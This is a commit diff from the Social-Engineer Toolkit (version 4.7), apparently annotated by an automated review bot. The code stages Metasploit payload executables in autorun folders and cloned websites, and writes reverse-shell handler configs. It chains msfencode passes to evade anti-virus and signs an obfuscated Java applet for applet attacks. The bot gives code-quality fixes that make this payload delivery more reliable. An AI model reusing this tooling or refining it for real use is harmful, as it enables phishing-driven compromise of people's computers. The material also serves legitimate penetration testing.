Updated code base for version 4.7

This commit is contained in:
TrustedSec 2013-03-15 11:35:31 -04:00
parent e18754c11f
commit bf0ac67474
12 changed files with 50 additions and 45 deletions


@ -20,7 +20,7 @@ me = mod_name()
trigger = 0
if os.path.isfile("src/program_junk/standardpayload.file"):
trigger = 1
subprocess.Popen("rm -rf autorun/ 1> /dev/null 2> /dev/null;mkdir autorun;cp src/html/msf.exe autorun/program.exe 1> /dev/null 2> /dev/null;cp src/program_junk/msf.exe autorun/program.exe 1> /dev/null 2>/dev/null", shell=True).wait()
subprocess.Popen("rm -rf autorun/ 1> /dev/null 2> /dev/null;mkdir autorun;cp src/program_junk/msf.exe autorun/program.exe 1> /dev/null 2> /dev/null;cp src/program_junk/msf.exe autorun/program.exe 1> /dev/null 2>/dev/null", shell=True).wait()
if os.path.isfile("src/program_junk/fileformat.file"):
trigger = 2
subprocess.Popen("rm -rf autorun/ 1> /dev/null 2> /dev/null;mkdir autorun;cp src/program_junk/template.pdf autorun/ 1> /dev/null 2>/dev/null", shell=True).wait()
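Review bot: The new shell string runs `cp src/program_junk/msf.exe autorun/program.exe` twice in a row (the first copy used to come from src/html/msf.exe and now merely duplicates the second), so one of the two is dead. Because both copies redirect stdout and stderr to /dev/null, a missing payload also fails silently and leaves autorun/ without program.exe. Since every path here is fixed, the whole command can become `shutil.rmtree("autorun", ignore_errors=True)`, `os.mkdir("autorun")` and `shutil.copyfile("src/program_junk/msf.exe", "autorun/program.exe")` (assuming shutil is imported in this module), which raises on a missing source instead of hiding it. The enclosing block starts outside the hunk.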


@ -293,7 +293,7 @@ try:
check_write=file("src/program_junk/custom.exe", "w")
check_write.write("VALID")
check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe") #subprocess.Popen("cp %s msf.exe;cp msf.exe %s/src/html/msf.exe" % (choice1,definepath), shell=True).wait()
shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("msf.exe", "%s/src/program_junk/msf.exe" % (definepath))
# Specify Encoding Option
@ -455,8 +455,10 @@ try:
# here we prep our meta config to listen on all the ports we want - free hugs all around
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
filewrite.close()
port_check = check_ports("%s/src/program_junk/meta_config_multipyinjector" % (definepath), shellcode_ports)
if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
filewrite.close()
if validate_ip(choice2) == False:
if choice9 != "windows/meterpreter/reverse_https":
@ -637,7 +639,6 @@ try:
if encode == "MULTIENCODE":
print_info("Encoding the payload multiple times to get around pesky Anti-Virus.")
encodepayload=subprocess.Popen(r"ruby %s/msfencode -e x86/shikata_ga_nai -i %s/src/program_junk/1msf.exe -t raw -c 5 | ruby %s/msfencode -t raw -e x86/alpha_upper -c 2 | ruby %s/msfencode -t raw -e x86/shikata_ga_nai -c 5 | ruby %s/msfencode -t exe -c 5 -e x86/countdown -o %s/src/program_junk/msf.exe" % (path,definepath,path,path,path,definepath), shell=True).wait()
#subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
encode1=("x86/countdown")
# If option 16, backdoor executable better AV avoidance
@ -704,24 +705,26 @@ try:
# if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/src/program_junk/multi_meta" % (definepath)):
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST 0.0.0.0" + "\n")
if flag == 0:
filewrite.write("set LPORT "+choice3+"\n")
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("exploit -j\n\n")
port_check = check_ports("%s/src/program_junk/meta_config" % (definepath), choice3)
if port_check == False:
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST 0.0.0.0" + "\n")
if flag == 0:
filewrite.write("set LPORT "+choice3+"\n")
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("exploit -j\n\n")
# if we want to embed UNC paths for hashes
if unc_embed == "ON":
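Review bot: In the -455 hunk the handle opened by `filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")` is only closed inside the `if port_check == False:` branch, so when check_ports reports the port as already configured the file stays open. Opening it inside the branch fixes that: move the `filewrite = file(...)` line under the `if`, directly before the write, and keep `filewrite.close()` where it is. The same `== False` comparison is used in the -704 hunk; `if not port_check:` is the idiomatic form, but if check_ports can return something other than a bool (for instance None when the config file is missing) the two differ, so confirm its return values before switching. Both hunks sit inside a `try:` that begins outside this section.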


@ -129,7 +129,7 @@ if payload_selection == "SETSHELL":
filewrite = open("src/program_junk/msf.exe" , "wb")
filewrite.write(data.replace(str(ipaddr_count), ipaddr+"\x00", 1))
filewrite.close()
shutil.copyfile("src/program_junk/msf.exe", "src/html/msf.exe")
#shutil.copyfile("src/program_junk/msf.exe", "src/html/msf.exe")
# if we selected RATTE in our payload selection
if payload_selection == "RATTE":
@ -209,9 +209,9 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
shutil.copyfile("src/program_junk/web_clone/x", "src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/html/msf.exe"):
os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/html/msf.exe")
#if os.path.isfile("src/html/msf.exe"):
# os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
os.remove("src/program_junk/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
@ -231,9 +231,9 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
shutil.copyfile("src/payloads/set_payloads/http_shell.binary", "src/program_junk/web_clone/msf.exe")
if os.path.isfile("src/html/msf.exe"):
os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/html/msf.exe")
# if os.path.isfile("src/html/msf.exe"):
# os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
os.remove("src/program_junk/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
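Review bot: In the -209 and -231 hunks the line that now reads `shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")` is immediately followed by three lines that test for that same destination, remove it and copy it again, so the first copy is redundant and only doubles the I/O; drop it in both places. The old src/html branch was kept as commented-out code (`#if os.path.isfile("src/html/msf.exe"):` and the line under it), and the -129 hunk does the same with `#shutil.copyfile("src/program_junk/msf.exe", "src/html/msf.exe")`; these should be deleted rather than left in place, since version control already keeps the history. The surrounding `stager` branch continues outside the hunks.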


@ -782,8 +782,8 @@ try:
if os.path.isfile("src/program_junk/meterpreter.alpha"):
print "[*] Saving alphanumeric shellcode in root directory of SET as meterpreter.alpha"
shutil.copyfile("src/program_junk/meterpreter.alpha", "meterpreter.alpha")
if os.path.isfile("src/html/msf.exe"):
shutil.copyfile("src/html/msf.exe", "msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
shutil.copyfile("src/program_junk/msf.exe", "msf.exe")
# if we didn't select the SET interactive shell or RATTE
if not os.path.isfile("src/program_junk/set.payload"):


@ -612,7 +612,7 @@ def meterpreter_reverse_tcp_exe(port):
random_value = generate_random_string(5, 10)
# copy the created executable to program_junk
print_status("Executable created under src/program_junk/%s.exe" % (random_value))
subprocess.Popen("cp src/html/msf.exe src/program_junk/%s.exe" % (random_value), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/%s.exe" % (random_value), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
#
# Start a metasploit multi handler
#
@ -692,7 +692,7 @@ def java_applet_attack(website, port, directory):
#if os.path.isfile("src/program_junk/rand_gen"):
# move the file to the specified directory and filename
subprocess.Popen("cp src/html/msf.exe %s/%s" % (directory,filename), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp src/program_junk/msf.exe %s/%s" % (directory,filename), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# lastly we need to copy over the signed applet
subprocess.Popen("cp src/program_junk/Signed_Update.jar %s" % (directory), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
@ -844,7 +844,7 @@ def show_banner(define_version,graphic):
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Headshot""" + bcolors.BLUE + """' [---]
[---] Codename: '""" + bcolors.YELLOW + """Headshot""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]
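Review bot: The rewritten copy in java_applet_attack, `subprocess.Popen("cp src/program_junk/msf.exe %s/%s" % (directory,filename), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()`, still interpolates `directory` and `filename` unquoted into a shell string, so a path containing spaces or shell metacharacters silently changes the command, and since stderr is piped and never read the failure is invisible. `shutil.copyfile("src/program_junk/msf.exe", os.path.join(directory, filename))` does the same job without a shell and raises on failure; the Signed_Update.jar copy on the next line takes `directory` the same way. The same shell-string shape survives in this commit's new lines in web_server_start (the -300 hunk, with `apache_path`) and in the -118 hunk further down (`"cp src/program_junk/msf.exe %s/x.exe" % (apache_path)`). The -612 hunk is less exposed because random_value is generated locally, but would read better as a copyfile too.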


@ -92,7 +92,7 @@ def deploy_hex2binary(ipaddr,port,username,password,option):
if not os.path.isfile("src/program_junk/set.payload"):
if operating_system == "posix":
web_path = ("src/program_junk")
subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
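Review bot: The replaced line now runs `cp src/program_junk/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null`, which copies the file onto itself; cp rejects that as the same file and the redirect hides the error, so the line is a no-op and should be removed — the following line, which copies msf2.exe over msf.exe, is the only effective step. That step would be clearer as `shutil.copyfile("src/program_junk/msf2.exe", "src/program_junk/msf.exe")` (if shutil is imported in this module), which also surfaces a missing msf2.exe instead of silently leaving a stale msf.exe for the `file("%s/msf.exe" % (web_path), "rb")` read below. deploy_hex2binary continues outside the hunk.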

Binary file not shown.


@ -196,15 +196,16 @@ def web_server_start():
if os.path.isfile("%s/src/html/mac.bin" % (definepath)):
mac = check_options("MAC.BIN=")
shutil.copyfile("%s/src/html/mac.bin" % (definepath), "%s/src/program_junk/web_clone/%s" % (definepath, mac))
if os.path.isfile("%s/src/html/msf.exe" % (definepath)):
if os.path.isfile("%s/src/program_junk/msf.exe" % (definepath)):
win = check_options("MSF.EXE=")
shutil.copyfile("%s/src/html/msf.exe" % (definepath), "%s/src/program_junk/web_clone/%s" % (definepath,win))
shutil.copyfile("%s/src/program_junk/msf.exe" % (definepath), "%s/src/program_junk/web_clone/%s" % (definepath,win))
# pull random name generation
print_status("The site has been moved. SET Web Server is now listening..")
rand_gen = check_options("MSF_EXE=")
if rand_gen != 0:
if os.path.isfile("%s/src/program_junk/custom.exe" % (definepath)):
shutil.copyfile("src/html/msf.exe", "src/program_junk/web_clone/msf.exe")
shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe")
print "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/web_clone/%s" % (rand_gen))
os.chdir("%s/src/program_junk/web_clone" % (definepath))
@ -300,7 +301,7 @@ def web_server_start():
break
if apache == 1:
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/src/html/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/Signed* %s 1> /dev/null 2> /dev/null" % (definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path), shell=True).wait()
subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/src/program_junk/Signed* %s 1> /dev/null 2> /dev/null" % (definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path,definepath,apache_path), shell=True).wait()
# if we are tracking users
if track_email == "on":
now=datetime.datetime.today()
@ -463,7 +464,7 @@ try:
print (bcolors.BLUE + "\n***************************************************")
print (bcolors.YELLOW + "Web Server Launched. Welcome to the SET Web Attack.")
print (bcolors.BLUE + "***************************************************")
print (bcolors.PURPLE+ "\n[--] Tested on Windows, Mac, and OSX [--]" + bcolors.ENDC)
print (bcolors.PURPLE+ "\n[--] Tested on Windows, Linux, and OSX [--]" + bcolors.ENDC)
if apache == 1:
print (bcolors.GREEN+ "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC)
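Review bot: In the -196 hunk the new `shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/msf.exe")` uses paths relative to the working directory while the lines just above build the same locations from `definepath` (`"%s/src/program_junk/msf.exe" % (definepath)`); this function later does `os.chdir` into web_clone, so mixing the two bases is fragile and the relative forms should be prefixed with definepath like their neighbours. The destination in `shutil.copyfile("%s/src/program_junk/msf.exe" % (definepath), "%s/src/program_junk/web_clone/%s" % (definepath,win))` comes straight from `check_options("MSF.EXE=")`; the `rand_gen != 0` test a few lines later suggests check_options can return 0, in which case the payload would be written to a file literally named `0` — worth confirming and guarding the same way rand_gen is. web_server_start begins outside this section.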

Binary file not shown.


@ -99,6 +99,7 @@ if multi_injection == "on":
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\nset PAYLOAD %s\n set LHOST 0.0.0.0\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ports))
filewrite.close()
# if its turned to off
if multi_injection == "off":
print_status("Generating x64-based powershell injection code...")
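Review bot: The added `filewrite.close()` fixes the leaked handle, but the open/write/close triple would be tidier as `with open("%s/src/program_junk/meta_config" % (definepath), "a") as filewrite:` wrapping the write, which also closes the file if the write raises (if the project's Python baseline permits `with`). Separately, the resource-script text on the write line contains `"\n set LHOST 0.0.0.0"` with a stray leading space, unlike the other handler blocks in this commit; msfconsole probably tolerates it, but it is worth normalizing to `\nset LHOST 0.0.0.0` while these lines are being touched.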


@ -118,12 +118,12 @@ pause = raw_input("Press {return} to continue.")
if payload_counter == 1:
if apache == 0:
subprocess.Popen("mkdir src/program_junk/web_clone/;cp src/html/msf.exe src/program_junk/web_clone/x.exe 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("mkdir src/program_junk/web_clone/;cp src/program_junk/msf.exe src/program_junk/web_clone/x.exe 1> /dev/null 2> /dev/null", shell=True).wait()
if operating_system != "windows":
child=pexpect.spawn("python src/html/web_server.py")
if apache == 1:
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
subprocess.Popen("cp src/program_junk/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
if os.path.isfile("src/program_junk/meta_config"):
print bcolors.BLUE + "\n[*] Launching MSF Listener..."
print bcolors.BLUE + "[*] This may take a few to load MSF..." + bcolors.ENDC
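Review bot: In the `apache == 0` branch the new shell string `mkdir src/program_junk/web_clone/;cp src/program_junk/msf.exe src/program_junk/web_clone/x.exe 1> /dev/null 2> /dev/null` only redirects the cp, so whenever web_clone/ already exists mkdir prints a "File exists" error to the operator's terminal on every run, while a genuinely failed copy is hidden. Replacing it with `if not os.path.isdir("src/program_junk/web_clone"): os.mkdir("src/program_junk/web_clone")` followed by `shutil.copyfile("src/program_junk/msf.exe", "src/program_junk/web_clone/x.exe")` removes both the noise and the shell (assuming shutil is imported in this module). The enclosing `payload_counter == 1` block starts inside the hunk but the surrounding flow continues outside it.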


@ -22,9 +22,9 @@ Is this correct: yes
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias signapplet2 -keystore mykeystore -keypass mykeypass -storepass mystorepass", shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Update.jar signapplet2", shell=True).wait()
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar Java_Obf.jar signapplet2", shell=True).wait()
# move it into our html directory
subprocess.Popen("rm ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Signed_Update.jar ../../html/Signed_Update.jar.orig", shell=True).wait()
subprocess.Popen("cp Java_Update.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
subprocess.Popen("cp Java_Obf.jar ../../html/unsigned/unsigned.jar", shell=True).wait()
print "[*] New java applet has been successfully imported into The Social-Engineer Toolkit (SET)"